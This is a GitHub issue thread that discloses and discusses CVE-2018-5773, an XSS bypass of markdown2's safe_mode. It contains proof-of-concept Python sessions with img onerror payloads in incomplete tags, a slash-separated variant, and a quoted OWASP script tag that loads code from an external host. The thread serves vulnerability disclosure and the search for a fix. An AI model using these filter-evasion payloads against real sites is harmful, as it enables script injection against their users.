Possible XSS in safe_mode using incomplete tags

[vin01]

PoC with latest version:

>>> from markdown2 import markdown as mark
>>> mark('<img src="" onerror=alert(/XSS/)>', safe_mode=True)
u'<p>[HTML_REMOVED]</p>\n'
>>> mark('<img src="" onerror=alert(/XSS/) ', safe_mode=True) # Please notice the space at end of string.
u'<p><img src="" onerror=alert(/XSS/) </p>\n'

using safe_mode="escape":

>>> mark('<img src="" onerror=alert(/XSS/)>', safe_mode="escape")
u'<p>&lt;img src="" onerror=alert(/XSS/)&gt;</p>\n'
>>> mark('<img src="" onerror=alert(/XSS/) ', safe_mode="escape")
u'<p><img src="" onerror=alert(/XSS/) </p>\n'

It will trigger an alert box in Chrome. I think it will be a better approach to encode the incomplete tags as well to prevent it.

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

[thmo]

This is CVE-2018-5773, is there a fix?

[nicholasserra]

Not yet. PRs welcome!

[miigotu]

Any progress on this CVE, or is there an alternative that is safe(r) to use in the meantime?

[vin01]

@nicholasserra @thombashi Thanks for making an attempt to fix it. Unfortunately, XSS is still possible. A modified payload:

>>> from markdown2 import markdown as mark
>>> mark('<img/src="" onerror=alert(/XSS/) ', safe_mode=True)
u'<p><img/src="" onerror=alert(/XSS/) </p>\n'

From: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

I was able to do something similar with python-markdown as well and it looks like the community agrees on deprecating safe_mode and using tools like Bleach (https://bleach.readthedocs.io/en/latest/).

https://python-markdown.github.io/change_log/release-2.6/#safe_mode-deprecated

[lsh-0]

just an FYI, Github is now sending out reports.